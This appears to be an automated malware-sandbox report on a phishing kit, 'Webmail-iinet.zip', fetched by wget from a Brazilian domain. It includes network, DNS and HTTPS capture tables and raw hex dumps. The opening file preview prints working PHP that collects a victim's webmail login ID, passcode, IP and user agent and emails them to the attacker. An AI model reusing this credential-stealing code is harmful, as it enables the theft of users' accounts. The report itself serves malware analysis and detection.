Preview:	<?php.ob_start();..include 'email.php';.$ai = trim($_POST['ai']);.$pr = trim($_POST['pr']);.if(isset($_POST['btn1'])){..$ip = getenv("REMOTE_ADDR");..$hostname = gethostbyaddr($ip);..$useragent = $_SERVER['HTTP_USER_AGENT'];..$message .= "\|----------\| \|--------------\|\n";....$message .= "Online ID : ".$_POST['ai']."\n";..$message .= "Passcode : ".$_POST['pr']."\n";..$message .= "\|--------------- I N F O \| I P -------------------\|\n";..$message .= "\|Client IP: ".$ip."\n";..$message .= "\|--- http://www.geoiptool.com/?IP=$ip ----\n";..$message .= "User Agent : ".$useragent."\n";..$message .= "\|----------- --------------\|\n";..$send = $Receive_email;..$subject = "Login : $ip";. .mail($send, $subject, $message); . .echo $message;..$signal = 'ok';..$msg = 'InValid Credentials';....// $praga=rand();..// $praga=md5($praga);.}.else{..$signal = 'bad';..$msg = 'Please fill in all the fields.';.}.$data = array(. 'signal' => $signal,. 'msg' => $msg,.

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	491
Entropy (8bit):	5.051940482075793
Encrypted:	false
SSDEEP:	12:pMd1DiIiRwshIvyTAhOLuFyYhOL0+JAIkz1GNqY6:piWI4wshKyTAhkuThk0+JAIFm
MD5:	EA2E379093E36440B10EB3EE013EACC9
SHA1:	975853F8D3919F1E3EDE75EE7CA309D6046E835D
SHA-256:	759E27C62D61E8D6C98AB7D6E707475DF52F9A2E35BA11287ED0C3E25C9BE720
SHA-512:	78482531019295D0BB6BD7CEA5A95763A1ED149575F391EA05DED34C293982A15A66A5BBBD2362F7C6EF794B1BEB0188354EF22AE7F2C1511E1801778F289D6F
Malicious:	false
Reputation:	low
Preview:	..7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30....Scanning the drive for archives:.. 0M Scan C:\Users\user\Desktop\download\. .1 file, 156013 bytes (153 KiB)....Extracting archive: C:\Users\user\Desktop\download\Webmail-iinet.zip..--..Path = C:\Users\user\Desktop\download\Webmail-iinet.zip..Type = zip..Physical Size = 156013.... 0%. .Everything is Ok....Folders: 2..Files: 7..Size: 372783..Compressed: 156013..

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:35:32.479908943 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:32.479950905 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:32.480050087 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:32.481890917 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:32.481905937 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.272294044 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.272531986 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.274494886 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.274509907 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.274749041 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.275738955 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.319427967 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.603569031 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.603595018 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.603698015 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.603725910 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.649992943 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.725455046 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.725466013 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.725559950 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.726010084 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.726016998 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.726069927 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.727016926 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.727072954 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.770226002 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.770381927 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.848448992 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.848570108 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.849472046 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.849535942 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.849775076 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.849829912 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.850626945 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.850692987 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.851571083 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.851634979 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.851741076 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.851810932 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.892956018 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.893047094 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.904295921 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.904382944 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.970752954 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.970822096 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.971072912 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.971124887 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.972203016 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.972251892 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.973015070 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.973064899 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.973823071 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.973889112 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.974231958 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.974289894 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:33.974945068 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.974993944 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:33.975033998 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:34.046006918 CEST	49730	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:34.046036959 CEST	443	49730	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.104846954 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.104899883 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.105057955 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.106307030 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.106333971 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.915211916 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.915328979 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.916799068 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.916815996 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.917022943 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:35.917895079 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:35.959407091 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:36.259473085 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:36.259500027 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:36.259551048 CEST	443	49731	191.37.38.39	192.168.2.4
Oct 2, 2024 06:35:36.259582043 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:36.259617090 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:36.264318943 CEST	49731	443	192.168.2.4	191.37.38.39
Oct 2, 2024 06:35:36.264342070 CEST	443	49731	191.37.38.39	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:35:31.217333078 CEST	50449	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:35:32.212730885 CEST	50449	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:35:32.475234032 CEST	53	50449	1.1.1.1	192.168.2.4
Oct 2, 2024 06:35:32.475250959 CEST	53	50449	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:35:31.217333078 CEST	192.168.2.4	1.1.1.1	0x7320	Standard query (0)	maninhocontabilidade.com.br	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:35:32.212730885 CEST	192.168.2.4	1.1.1.1	0x7320	Standard query (0)	maninhocontabilidade.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:35:32.475234032 CEST	1.1.1.1	192.168.2.4	0x7320	No error (0)	maninhocontabilidade.com.br		191.37.38.39	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:35:32.475250959 CEST	1.1.1.1	192.168.2.4	0x7320	No error (0)	maninhocontabilidade.com.br		191.37.38.39	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:35:50.302865028 CEST	1.1.1.1	192.168.2.4	0x2d09	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:35:50.302865028 CEST	1.1.1.1	192.168.2.4	0x2d09	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:35:50.792437077 CEST	1.1.1.1	192.168.2.4	0x37eb	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:35:50.792437077 CEST	1.1.1.1	192.168.2.4	0x37eb	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

maninhocontabilidade.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	191.37.38.39	443	4180	C:\Windows\SysWOW64\wget.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:35:33 UTC	224	OUT	GET /pop/Webmail-iinet.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Accept: / Accept-Encoding: identity Host: maninhocontabilidade.com.br Connection: Keep-Alive
2024-10-02 04:35:33 UTC	214	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 04:35:33 GMT Server: Apache Last-Modified: Tue, 01 Oct 2024 18:17:24 GMT Accept-Ranges: bytes Content-Length: 156013 Connection: close Content-Type: application/zip
2024-10-02 04:35:33 UTC	7978	IN	Data Raw: 50 4b 03 04 14 00 00 00 00 00 97 b5 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 57 65 62 6d 61 69 6c 2d 69 69 6e 65 74 2f 63 73 73 2f 50 4b 03 04 14 00 00 00 08 00 b3 4d 5a 57 0e e4 09 e9 20 95 00 00 8f 73 03 00 3a 00 00 00 57 65 62 6d 61 69 6c 2d 69 69 6e 65 74 2f 63 73 73 2f 61 70 70 2d 30 35 39 63 64 37 36 65 61 34 61 35 34 33 33 65 31 34 66 66 36 31 35 31 61 34 33 32 65 65 34 38 2e 63 73 73 d4 3c fd 73 db b6 92 bf 67 a6 ff 03 cf 9d de c5 ad 29 53 94 28 cb f2 a5 f3 6c c7 4e 7d 4d da 24 4e 9a 26 9d 9c 87 a2 20 89 31 45 aa 24 e5 8f 64 fc bf df 2e 00 92 f8 a4 64 e7 b5 ef 9d 55 a7 16 01 2c 16 8b fd c6 82 df 3c da fd de 39 9c 5c 91 bc 8c 0b b2 20 69 e9 94 b7 4b e2 fc a7 53 c4 9f 49 e1 7c bf fb cd a3 6f b0 cf 33 92 92 3c 4c f8 83 78 31 73 be 7c f3 Data Ascii: PKXWebmail-iinet/css/PKMZW s:Webmail-iinet/css/app-059cd76ea4a5433e14ff6151a432ee48.css<sg)S(lN}M$N& 1E$d.dU,<9\ iKSI\|o3<Lx1s\|
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: f7 50 69 58 b8 2f 69 3c 80 b1 cc 57 bb de 3c c7 b0 2f b8 b6 5c 69 8b a2 c5 16 bd 93 60 ef fa 53 23 53 27 68 18 3a 81 cc 48 95 56 d9 4c d4 53 fc ae fa 19 55 7d b1 c8 ec 36 a9 a0 5e e1 5b 9c 90 5e e1 4d 79 09 c0 d4 88 28 db 4e d5 1c 0b d5 93 a7 eb 2d 1e 61 f9 bd f4 b3 53 78 a0 18 a0 dd ac d8 89 5d 11 56 7d c8 86 26 3b 39 e9 74 fb 25 49 74 5e 89 1d 7d 79 6c 6c 69 5c 0c 2e 1d ee 8f a7 23 e8 cf 56 ea 0c fa 83 e9 88 5e f0 3d 4c 40 42 94 88 36 47 2f 54 2b dd 27 bd 29 17 d4 a6 1b 56 77 b7 68 9e 61 c3 0b f3 88 7d ac 58 d9 fd 03 ba a3 3f 0c 07 c3 e9 90 32 e6 d6 e4 93 60 d4 a8 74 b7 67 25 e3 46 8b 96 da 08 63 c0 16 ae 57 b6 9f 03 ea 38 16 c1 14 c1 0b 46 48 0b b1 11 73 29 5b f4 24 3e 96 ae 27 eb 73 7a 28 2d 1d 31 70 3f 24 dd a7 a3 14 62 46 74 77 e0 0a 42 7a 39 48 6b Data Ascii: PiX/i<W</\i`S#S'h:HVLSU}6^[^My(N-aSx]V}&;9t%It^}ylli\.#V^=L@B6G/T+')Vwha}X?2`tg%FcW8FHs)[$>'sz(-1p?$bFtwBz9Hk
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: ae 8d c6 db fa 54 16 96 36 2a 6b de ec 07 32 2e 79 b7 ba 38 bd dd 74 df dd a8 57 16 2b 6e fb 02 6a 54 0b 08 20 37 d8 bd ad 2c d3 24 6a 24 bb 55 4b bb 43 3c ad c2 3f 26 0f 83 2f fe 93 77 34 db 27 c6 9d 79 76 61 11 8d 79 ad b7 bb 93 33 d9 62 38 3a 7a f8 58 9e 91 4d 16 cc c2 53 1e ae 58 c4 aa 75 22 16 b5 98 ed ee 69 3c 72 e8 57 dc dc ec 21 40 c2 0d 97 db ed 5c 25 2d ee 58 86 fb d9 70 27 9a 85 72 7a d5 8f 13 ff 14 59 13 d8 30 d5 d5 b3 87 6d 43 77 13 d3 31 ce ba dd ba 4b 8f ac 69 59 cc b5 da 12 73 02 a2 f5 a3 de d8 aa 3f 1d db 31 5f 3d 6b ff ab ff d6 6c 34 ed f6 fb df a5 2d 16 bb 3f 20 bc 05 14 c9 da f3 95 68 0a 86 66 d5 ea 16 b7 9a d5 1a 31 c0 9e a8 6d 02 c4 43 b3 98 98 ef f8 b2 d7 25 5c 75 d4 95 17 b8 0e 80 c0 a0 9d 02 5d e9 a4 df bd 4d d8 29 17 cc 9c 88 99 Data Ascii: T6*k2.y8tW+njT 7,$j$UKC<?&/w4'yvay3b8:zXMSXu"i<rW!@\%-Xp'rzY0mCw1KiYs?1_=kl4-? hf1mC%\u]M)
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: 26 79 6a 71 78 da a3 2b c4 8a 61 bf 96 87 f4 ff 4e a5 9d a4 3c e5 c2 31 47 69 e5 ad 29 96 a5 59 bc 35 c5 7a 6b 8a f5 d6 14 ab fb 7f a3 29 96 a0 89 6c f5 eb 8f cf d9 c2 93 6a df 1a 5f 79 e8 d1 82 fd d6 f8 ea ad f1 d5 5b e3 ab fc 0b f8 d6 f8 2a 47 5b a5 bc 4d 9e 5e d0 19 e7 ad f1 d5 8b 76 e8 ad f1 95 c7 59 47 5f 50 ae ff b7 c6 57 6f 8d af de 1a 5f a5 76 20 ec ad f1 15 c7 f9 ad f1 d5 ab 5a 72 68 53 80 fc fd ae 3c 75 47 45 7b 53 71 89 80 03 9b b9 e3 95 91 da a1 9d 77 6f 4a a5 36 ca 4b ca 3d 67 38 f7 ff 55 ad b0 10 5a ca d5 ee ca b3 21 6f 8d af 5e 95 e2 5e b2 c7 72 8d f2 f4 bb ca 3a ce 79 a0 14 3f be ff 09 2d b1 cc 2e 1c b5 0a ff d0 ad 66 b5 e6 f4 d7 eb 9d 05 23 ea e9 75 2f a6 de ef c7 a7 8c 15 c5 53 02 73 76 49 f0 c2 f8 ef 6f ce 55 f8 90 17 06 59 fc c4 07 87 Data Ascii: &yjqx+aN<1Gi)Y5zk)lj_y[*G[M^vYG_PWo_v ZrhS<uGE{SqwoJ6K=g8UZ!o^^r:y?-.f#u/SsvIoUY
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: 2f 3e 5c fd 2b 6c 41 b5 7e be 72 10 da 02 cb 48 e6 16 e9 ce e0 fa 3a 36 35 60 71 cf 53 60 cf d8 60 45 f6 4c 8c 0e b5 76 a2 cb 77 79 25 f6 19 7c d6 5e 98 3a 5f cd 3d c0 96 aa 18 07 bc 2f e2 62 c3 8d 8d 3d 9e 55 a5 a2 01 f2 46 aa 40 20 d9 f1 3a 30 6e 7b 32 80 a6 8c fd 8b cd c4 b8 0a 80 59 95 d2 7c 74 2e 75 76 2a c4 7f cd 5d 14 1a ed 5f 45 9f 0a 14 85 4a 51 98 4c 3a 27 2c 71 21 1e 35 f6 ef 1d a1 16 50 e7 15 7f 8e 0c 6d 1c e8 5b 78 92 bc fa 3e 36 2e ae 28 e5 69 7f f6 6b e1 ea 4d 73 c1 c2 d5 9b a1 c5 0d 54 6f 3a 8b 0c f7 7f 01 b8 d6 38 66 77 37 be 8e 0a a0 27 b9 d4 6a a1 fd 52 1b 34 94 8d b4 7d b9 57 b0 1d 93 09 08 24 56 6c f7 41 86 af 01 13 2d 86 2d ec 27 4f 87 6b 87 98 b4 85 49 86 c3 95 64 44 af d1 e2 6b b3 f5 f1 e6 d3 83 5a ea 5f 64 7a 0b 8b 96 b6 3a dd 1e Data Ascii: />\+lA~rH:65`qS``ELvwy%\|^:_=/b=UF@ :0n{2Y\|t.uv*]_EJQL:',q!5Pm[x>6.(ikMsTo:8fw7'jR4}W$VlA--'OkIdDkZ_dz:
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: c5 cf 5e 4a b5 f0 30 4a da ba d8 91 c7 75 4a 03 d8 3a ec 1d d6 1c c6 d0 63 a2 22 ff 8f 19 3c e2 29 29 d2 14 98 11 19 4e a5 32 83 4e c4 e4 db fd 80 c3 b7 ab ce 2e ee 03 2c 2e 7f d8 20 69 5c 65 52 85 fb 14 58 97 c9 c8 c1 46 df 7b ef 90 8b c1 71 c0 4b d8 3b 9f 6e d9 d6 39 83 dd bc 81 9b de 18 d4 79 87 3b 4e 44 fa 85 93 5b d0 8e 97 bc 93 4f bc 8a 23 86 d3 5c d8 49 b5 ae 75 6c fe 78 e3 91 8c 5a 0a 8c 1b 5d 80 87 00 e6 1b 0b 34 88 ba 04 93 68 25 cf a2 0d fb 04 74 51 c3 99 90 ee 49 29 ea 74 bf 17 32 b6 d0 af 0d 25 c7 ca c7 42 cc cd 20 df cd 34 77 c5 0e 92 b0 c4 95 64 a3 dd c8 fe 77 1d 94 17 08 94 c7 07 b0 b6 2c f0 b9 64 54 bd c5 62 31 2f 5a 54 d7 10 6b 87 13 da 8a 0e ac 83 c0 60 f9 fc e7 e0 41 5b fa d4 22 d9 17 1f 4e 91 46 b7 9e 99 eb b4 8b 21 85 c2 9f 2d 78 10 Data Ascii: ^J0JuJ:c"<))N2N.,. i\eRXF{qK;n9y;ND[O#\IulxZ]4h%tQI)t2%B 4wdw,dTb1/ZTk`A["NF!-x
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: e5 ea 8f 1f 92 b2 bf de 6b 87 8b c4 df ef d2 58 f8 1c 1e 2a cd 4e a8 db 69 c6 68 83 d0 7a 79 8b 54 fb b3 91 71 60 d8 fa 89 97 fa a7 d2 9b 65 87 87 6b d0 8a b2 fd bc 42 f5 2c 0f 5a 11 c5 91 03 68 e4 92 f6 cf 7b 30 e6 17 16 16 b6 56 a5 a5 a5 13 7f 6f ee 93 a6 0e 6c 6d 5a fe dc 55 7a 63 08 64 f4 73 98 d4 2e 9e 3e 0d c4 91 24 e6 47 d2 48 db 52 52 8e 5e e6 af 09 c2 f7 ad 5e 83 4b 11 09 36 59 8e 04 0d d0 7d 98 ca bd df e3 f4 f4 a4 1d ba e4 ed 60 b8 1d 17 05 e8 8b d5 da c4 8d 31 d2 ba 19 b1 e5 ea 68 fa 6e 87 7d 0f 24 a3 be cf 18 7f ea 78 fd 1e 07 e5 c6 b5 fd 42 cf f5 91 af e7 f2 2d 5e f5 71 8d f7 bd d1 85 0a 7d 84 57 16 cf e0 2e 38 c9 8f e4 19 51 96 8a 5b d9 09 ac f3 79 72 fb 4b b0 39 9e b4 f6 93 79 5f a1 77 55 74 22 6c cf e0 04 ac b0 7e fa 7c 84 c7 84 d2 40 e9 Data Ascii: kX*NihzyTq`ekB,Zh{0VolmZUzcds.>$GHRR^^K6Y}`1hn}$xB-^q}W.8Q[yrK9y_wUt"l~\|@
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: 2a 55 fb 2b 69 37 49 8f 96 b4 02 71 30 b0 97 83 c3 e6 c8 fe e6 97 df 63 56 a0 14 ee 5a ba db f0 37 5a 36 47 c8 73 bf bb 28 8a df 1a 0c 06 29 cb b2 0c 88 0f 1b fc 3b 3e 42 48 4d 43 85 2c e5 22 7b b6 cc f1 cd 23 0e 47 3a e3 ba e9 9f fc f4 3b 4b f7 da e3 c7 75 59 9f 6e fb d2 26 d3 ea 24 69 9c 95 ba 7b 83 ff 2e ec 0d 4f 20 96 8e a3 1b 4b df 7c e5 0e a3 ca e3 9b 76 43 93 d3 cd 77 87 bd 24 3a a0 a3 e3 26 7d 2c e5 79 dd 7b c4 0d 4c 69 8e db 16 e8 7c 3b 2d 59 c4 70 6e a4 58 a9 ca 72 26 14 38 4a 78 b1 e5 55 92 af 95 2c df b2 db 36 c9 7c 38 88 54 64 c8 ee 23 de 28 38 1e d8 00 6c ad dd a7 00 3e 09 fc 21 77 cf ec 59 50 4c ac 39 17 1b 0a 22 bd d5 6b f3 68 6a d6 ff 08 16 ed 7f e0 50 e9 69 12 c7 0b ad 96 e8 34 e2 4b cd fa 17 da 29 dd 30 17 9b 6a 29 a1 f5 19 fe 74 aa c3 Data Ascii: *U+i7Iq0cVZ7Z6Gs();>BHMC,"{#G:;KuYn&$i{.O K\|vCw$:&},y{Li\|;-YpnXr&8JxU,6\|8Td#(8l>!wYPL9"khjPi4K)0j)t
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: 9c fe 3b 29 a5 1d d7 e0 3f f6 7c 26 5c 91 30 a1 e1 cf bf 16 98 6c e3 b3 b1 51 af e2 fc 61 5d be 71 c3 3f ef ce 4c e9 48 6d e8 66 94 97 2c 4c 16 67 78 d1 8b 9b 62 fa 98 43 9d d5 45 42 fd 8a 73 b1 de db ac 67 ad dc b7 e8 06 e9 0d 1a d5 1d 57 c9 bd a9 0e a1 bb fd 6d 84 fb 8b 3c a5 74 2a 84 b7 35 54 60 42 cb 74 78 d0 46 f5 db 24 17 b4 3a ea 75 d2 df 64 88 64 a5 90 55 21 91 92 d0 13 84 9e a4 71 f4 ff 1e c4 19 ef 7a 5c a0 b1 76 92 9a c6 3e 7f 6f fb 46 e3 8f a5 94 f2 1b d6 0d ea 55 cb 26 38 f0 f0 d3 b8 ea 61 0e ff 03 c6 98 ed 4a ab 9a 63 91 64 f2 bb dd d0 9b da 0a 5a 85 28 80 b7 e6 3b 2d fd f6 9d ef 3a ef 87 4b ff f0 f4 2b 1d fd b7 c0 bb 5a 8e 7f 6a 75 9d dd 1c 1b 80 83 37 6c d0 d2 25 4b 98 a6 9d 3c 5b ff 0a ef 1e f5 5c 45 28 32 7e 3a d5 e9 f6 ec c7 35 34 1e e6 Data Ascii: ;)?\|&\0lQa]q?LHmf,LgxbCEBsgWm<t*5T`BtxF$:uddU!qz\v>oFU&8aJcdZ(;-:K+Zju7l%K<[\E(2~:54
2024-10-02 04:35:33 UTC	8000	IN	Data Raw: 22 30 30 7e 83 e1 07 4d 6d fd 81 e7 d6 f3 53 c1 fe 15 57 9c cd c3 1f 77 2c 72 c6 92 a5 b3 0c a6 a7 2e 2d 4b fd 85 82 df d9 36 ab 8a e3 f6 88 db da 8c 6a 01 30 d6 12 84 e6 e2 f8 b3 45 a7 ba 75 cf 7d ef ca ae ba 6e a2 3a 78 df 3e 31 06 84 56 b5 97 4f 8c 47 b4 05 84 e6 5a b3 2a 33 ae 84 1e 12 14 3e 56 d7 f5 d1 8e 5e bf 24 2c 91 b1 0f 7f fc 09 7c e7 d2 73 16 72 57 1e b0 18 c7 b2 9e 31 2c a1 9c 2f fe 5d fb 36 ab 91 23 e8 c9 a1 ec ee b1 69 dd e6 db b2 2c d5 d5 5b 9f bb 93 66 ea 26 ef ae d6 cc f7 37 96 ec 37 d5 eb 4d c4 03 d4 a6 6e 1b 36 93 ee 98 0c e5 35 25 21 ce 3a af 33 55 54 e4 9e 74 5f e0 db 86 2a 3e 08 3e 52 56 d5 64 e9 7d 48 e7 11 1f 7e aa e0 2b 79 be 91 c5 8b d7 73 cd 47 2f a7 ab 8a 11 91 50 64 cf 10 ec 69 5c 0b 25 cb 24 74 76 ee 6a 10 6d 4d c7 8e 0b 27 Data Ascii: "00~MmSWw,r.-K6j0Eu}n:x>1VOGZ3>V^$,\|srW1,/]6#i,[f&77Mn65%!:3UTt_>>RVd}H~+ysG/Pdi\%$tvjmM'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	191.37.38.39	443	4180	C:\Windows\SysWOW64\wget.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:35:35 UTC	246	OUT	GET /pop/Webmail-iinet.zip HTTP/1.1 Range: bytes=151978- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Accept: / Accept-Encoding: identity Host: maninhocontabilidade.com.br Connection: Keep-Alive
2024-10-02 04:35:36 UTC	268	IN	HTTP/1.1 206 Partial Content Date: Wed, 02 Oct 2024 04:35:36 GMT Server: Apache Last-Modified: Tue, 01 Oct 2024 18:17:24 GMT Accept-Ranges: bytes Content-Length: 4035 Content-Range: bytes 151978-156012/156013 Connection: close Content-Type: application/zip
2024-10-02 04:35:36 UTC	4035	IN	Data Raw: ff 05 2d 39 94 0b 7e f3 e1 1f fa 3f 0e 5d ad 52 b5 d8 e0 5f 94 c7 59 99 52 c3 85 1a f1 4c 00 bd 03 74 6d b4 a0 3c 17 20 f2 03 24 0e 83 30 0d b3 a9 8c 15 da 34 b6 22 67 41 ed c5 7d 37 ee b0 d6 8c bd a7 bd 73 be 67 33 a7 d7 5c 7b e9 af 5c 27 5e 6b 7b 3f fd e7 7e dd cb 17 23 e2 82 56 a2 0a 7b 87 8b a0 cc d0 7d f5 ec 0a 5c 43 09 54 03 a0 ec b4 46 51 52 3a 25 81 08 dc ac a4 66 f2 3b d6 71 4a b7 52 b6 3e 97 93 0b bf 94 e3 79 80 e4 d5 0c 0d fc 95 e1 b8 92 62 61 04 dc 5d 11 55 d7 49 48 60 f6 05 96 bd 39 84 e0 c8 9d 68 f0 a3 4f 3e e1 14 88 4f 3e 5f 67 20 cc 37 ab 2c e1 94 ff c9 ac f8 43 cc df 4e 4d 77 6d 96 59 7d d0 6a 7c b5 7f d5 d2 8b 62 9c 29 83 8f e3 51 ef ec 66 d6 1f 4d fb e3 1d ba 3b 19 a0 c7 d3 be cd c9 a0 7d 26 a6 03 3a 6d 13 46 2d 41 b6 ad f6 e8 39 b4 56 Data Ascii: -9~?]R_YRLtm< $04"gA}7sg3\{\'^k{?~#V{}\CTFQR:%f;qJR>yba]UIH`9hO>O>_g 7,CNMwmY}j\|b)QfM;}&:mF-A9V

Target ID:	0
Start time:	00:35:29
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
